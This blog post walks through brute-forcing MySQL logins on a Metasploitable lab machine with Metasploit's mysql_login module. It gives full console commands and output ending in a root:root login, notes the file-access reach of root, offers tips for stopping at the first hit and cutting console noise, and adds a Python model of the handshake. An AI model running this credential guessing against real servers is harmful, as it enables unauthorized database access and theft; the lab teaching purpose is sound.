Friday, June 22, 2012

Bruteforce MySQL Using Metasploit


Hey guys,
I will demonstrate how to brute force MySQL logins using Metasploit. This is another attack against the Metasploitable distribution I mentioned in my previous post. It is very simple and shouldn’t take long to demonstrate, so here goes:
Code:
root@bt:/pentest/exploits/framework3# ./msfconsole
 
 
=[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 276 auxiliary
+ -- --=[ 210 payloads - 27 encoders - 8 nops
=[ svn r9671 updated today (2010.07.03)
 
msf > search mysql
[*] Searching loaded modules for pattern 'mysql'...
 
Auxiliary
=========
 
Name                         Rank    Description
----                         ----    -----------
admin/mysql/mysql_enum       normal  MySQL Enumeration Module
admin/mysql/mysql_sql        normal  MySQL SQL Generic Query
admin/tikiwiki/tikidblib     normal  TikiWiki information disclosure
scanner/mysql/mysql_login    normal  MySQL Login Utility
scanner/mysql/mysql_version  normal  MySQL Server Version Enumeration
 
Exploits
========
 
Name                             Rank     Description
----                             ----     -----------
linux/mysql/mysql_yassl_getname  good     MySQL yaSSL CertDecoder::GetName Buffer Overflow
linux/mysql/mysql_yassl_hello    good     MySQL yaSSL SSL Hello Message Buffer Overflow
windows/mysql/mysql_yassl_hello  average  MySQL yaSSL SSL Hello Message Buffer Overflow
 
msf > use scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options
Code:
Module options:
 
Name              Current Setting  Required  Description
----              ---------------  --------  -----------
BLANK_PASSWORDS   true             yes       Try blank passwords for all users
BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
PASSWORD                           no        A specific password to authenticate with
PASS_FILE                          no        File containing passwords, one per line
RHOSTS                             yes       The target address range or CIDR identifier
RPORT             3306             yes       The target port
STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
THREADS           1                yes       The number of concurrent threads
USERNAME                           no        A specific username to authenticate as
USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
USER_FILE                          no        File containing usernames, one per line
VERBOSE           true             yes       Whether to print output for all attempts
 
msf auxiliary(mysql_login) > set PASS_FILE /root/password.txt
PASS_FILE => /root/password.txt
msf auxiliary(mysql_login) > set USER_FILE /root/users.txt
USER_FILE => /root/users.txt
msf auxiliary(mysql_login) > set RHOSTS 10.113.8.102
RHOSTS => 10.113.8.102
msf auxiliary(mysql_login) > show options
 
Module options:
 
Name              Current Setting     Required  Description
----              ---------------     --------  -----------
BLANK_PASSWORDS   true                yes       Try blank passwords for all users
BRUTEFORCE_SPEED  5                   yes       How fast to bruteforce, from 0 to 5
PASSWORD                              no        A specific password to authenticate with
PASS_FILE         /root/password.txt  no        File containing passwords, one per line
RHOSTS            10.113.8.102        yes       The target address range or CIDR identifier
RPORT             3306                yes       The target port
STOP_ON_SUCCESS   false               yes       Stop guessing when a credential works for a host
THREADS           1                   yes       The number of concurrent threads
USERNAME                              no        A specific username to authenticate as
USERPASS_FILE                         no        File containing users and passwords separated by space, one pair per line
USER_FILE         /root/users.txt     no        File containing usernames, one per line
VERBOSE           true                yes       Whether to print output for all attempts
 
msf auxiliary(mysql_login) > exploit
 
[*] 10.113.8.102:3306 - Found remote MySQL version 5.0.51a
[*] 10.113.8.102:3306 Trying username:'admin' with password:''
[*] 10.113.8.102:3306 failed to login as 'admin' with password ''
[*] 10.113.8.102:3306 Trying username:'root' with password:''
[*] 10.113.8.102:3306 failed to login as 'root' with password ''
[*] 10.113.8.102:3306 Trying username:'god' with password:''
[*] 10.113.8.102:3306 failed to login as 'god' with password ''
[*] 10.113.8.102:3306 Trying username:'systemadm' with password:''
[*] 10.113.8.102:3306 failed to login as 'systemadm' with password ''
[*] 10.113.8.102:3306 Trying username:'daemon' with password:''
[*] 10.113.8.102:3306 failed to login as 'daemon' with password ''
[*] 10.113.8.102:3306 Trying username:'admin' with password:'pass'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'pass'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'password'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'password'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'PASSWD'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'PASSWD'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'passwd'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'passwd'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'Password'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'Password'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'admin'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'admin'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'root'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'root'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'adminadmin'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'adminadmin'
[*] 10.113.8.102:3306 Trying username:'root' with password:'pass'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'pass'
[*] 10.113.8.102:3306 Trying username:'root' with password:'password'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'password'
[*] 10.113.8.102:3306 Trying username:'root' with password:'PASSWD'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'PASSWD'
[*] 10.113.8.102:3306 Trying username:'root' with password:'passwd'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'passwd'
[*] 10.113.8.102:3306 Trying username:'root' with password:'Password'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'Password'
[*] 10.113.8.102:3306 Trying username:'root' with password:'admin'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'admin'
[*] 10.113.8.102:3306 Trying username:'root' with password:'root'
[+] 10.113.8.102:3306 - SUCCESSFUL LOGIN 'root' : 'root'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) >
 
Bingo! We found the root password, which is simply ‘root’ :-) Now let’s double-check it with the stock mysql client from the attacking box:
 
root@bt:/pentest/exploits/framework3# mysql -h 10.113.8.102 -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 53
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
 
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
 
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| tikiwiki |
| tikiwiki195 |
+--------------------+
4 rows in set (0.01 sec)
 
mysql>
Now we have complete control over their database server, yay! :-) A remote root login means every database on the box, the mysql.user grant table, and (since root normally holds the FILE privilege) reading and writing files on the database host with LOAD DATA INFILE and SELECT ... INTO OUTFILE. Two things worth noting beyond the weak password itself: root was allowed to connect from our attacking host at all, which is a misconfiguration in its own right, and the run above is noisy, because every guess is a separate TCP connection to port 3306. If one working credential per host is all you need, set STOP_ON_SUCCESS to true so the module ends at the first hit, and set VERBOSE to false to keep the console down to the successes.
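To make explicit what each line of that run costs and why the module behaves as it does, here is an added example (written for this page; it is not code from the original post or from Metasploit): a small offline model of the MySQL 4.1+ native authentication that a 5.0 server uses by default, a stand-in server that holds only the stored hash exactly as mysql.user.password does, and a loop that replays mysql_login's guess order with BLANK_PASSWORDS and STOP_ON_SUCCESS. The user and password lists are constructed to match the attempts visible in the console output above; the stand-in target, its root/root account and the passwordless 'guest' account are assumptions for the demo.

```python
"""
Offline model of what scanner/mysql/mysql_login does per guess against a
MySQL 4.1+ server (mysql_native_password). Added example; not Metasploit code.

Handshake (per TCP connection):
  server -> client : 20-byte random salt
  client -> server : SHA1(pw) XOR SHA1(salt || SHA1(SHA1(pw)))   (empty pw -> empty field)
  server keeps only SHA1(SHA1(pw)) ('*' + hex in mysql.user.password) and
  unmasks the response to check SHA1(unmasked) == stored.
"""
import hashlib
import os
from typing import Dict, List, Tuple


def sha1(data: bytes) -> bytes:
    return hashlib.sha1(data).digest()


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def stored_hash(password: str) -> str:
    """Value MySQL stores for a 4.1-style account; '' means 'no password'."""
    if password == "":
        return ""
    return "*" + sha1(sha1(password.encode())).hex().upper()


def client_response(password: str, salt: bytes) -> bytes:
    """Client half of the handshake: SHA1(pw) XOR SHA1(salt || SHA1(SHA1(pw)))."""
    if password == "":
        return b""                       # empty password -> empty auth-response field
    stage1 = sha1(password.encode())
    return xor(stage1, sha1(salt + sha1(stage1)))


class FakeMySQLServer:
    """Stand-in target (assumption for the demo). Holds stored hashes only,
    never plaintext, and verifies responses the way the real server does."""

    def __init__(self, accounts: Dict[str, str]):
        self.accounts = accounts         # username -> stored hash string
        self.handshakes = 0

    def handshake(self) -> bytes:
        self.handshakes += 1
        return os.urandom(20)            # fresh 20-byte salt for every connection

    def authenticate(self, user: str, salt: bytes, response: bytes) -> bool:
        stored = self.accounts.get(user)
        if stored is None:
            return False
        if stored == "":
            return response == b""       # passwordless account accepts only an empty field
        if len(response) != 20:
            return False
        stage2 = bytes.fromhex(stored[1:])
        stage1 = xor(response, sha1(salt + stage2))   # strip the salt-dependent mask
        return sha1(stage1) == stage2


def try_login(server: FakeMySQLServer, user: str, password: str) -> bool:
    """One guess == one connection: new salt, new response."""
    salt = server.handshake()
    return server.authenticate(user, salt, client_response(password, salt))


def mysql_login(server: FakeMySQLServer, users: List[str], passwords: List[str],
                blank_passwords: bool = True, stop_on_success: bool = False
                ) -> Tuple[List[Tuple[str, str]], int]:
    """Same guess order as the module run above: every user with '' first
    (BLANK_PASSWORDS), then each user through PASS_FILE in order.
    Returns (successful pairs, number of attempts actually made)."""
    attempts: List[Tuple[str, str]] = []
    if blank_passwords:
        attempts += [(u, "") for u in users]
    for u in users:
        attempts += [(u, p) for p in passwords]
    hits: List[Tuple[str, str]] = []
    made = 0
    for u, p in attempts:
        made += 1
        if try_login(server, u, p):
            hits.append((u, p))
            if stop_on_success:
                break
    return hits, made


def replay_is_rejected(server: FakeMySQLServer, user: str, password: str) -> bool:
    """A response captured from one handshake is useless on the next one."""
    captured = client_response(password, server.handshake())
    return not server.authenticate(user, server.handshake(), captured)


# Constructed to mirror /root/users.txt and /root/password.txt as seen in the output above.
USERS = ["admin", "root", "god", "systemadm", "daemon"]
PASSWORDS = ["pass", "password", "PASSWD", "passwd", "Password", "admin", "root", "adminadmin"]
# Constructed target: root/root like the Metasploitable box, plus a passwordless 'guest'.
TARGET = FakeMySQLServer({"root": stored_hash("root"), "guest": ""})

if __name__ == "__main__":
    print(mysql_login(TARGET, USERS, PASSWORDS, stop_on_success=True))   # ([('root', 'root')], 20)
    print(replay_is_rejected(TARGET, "root", "root"))                     # True
```

With STOP_ON_SUCCESS the model makes exactly the twenty guesses shown in the console before the root/root hit; without it the same lists cost 45 connections. replay_is_rejected shows why the module opens a fresh connection per guess rather than reusing a captured reply: the salt changes every handshake, so the response does too.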
